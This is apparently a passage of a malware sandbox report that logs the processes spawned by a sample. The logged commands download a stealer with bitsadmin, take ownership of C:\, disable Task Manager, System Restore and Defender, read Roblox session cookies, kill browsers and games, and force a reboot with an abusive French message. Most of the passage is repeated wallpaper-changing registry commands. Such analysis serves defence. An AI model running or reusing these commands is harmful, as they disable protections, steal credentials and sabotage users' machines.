| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\92BA.tmp\92BB.tmp\92BC.bat C:\Users\Admin\AppData\Local\Temp\test.exe"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\system32\takeown.exe
takeown /f C:\*.*
C:\Windows\system32\icacls.exe
Icacls C:\*.* /C /G Admin:F
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32417.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21237.vbs"
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\system32\rundll32.exe
rundll32 user32.dll, SwapMouseButton
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14070.vbs"
C:\Windows\system32\timeout.exe
timeout 14
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3d0 0x478
C:\Windows\system32\taskkill.exe
taskkill /F /IM hl2.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM javaw.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM RobloxPlayerBeta.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM GenshinImpact.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Among Us.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\system32\shutdown.exe
shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30130.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23646.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8377.vbs"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1942.vbs" 12449.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\12449.bat" "
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Users\Admin\AppData\Local\Temp\melter.exe
melter.exe
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
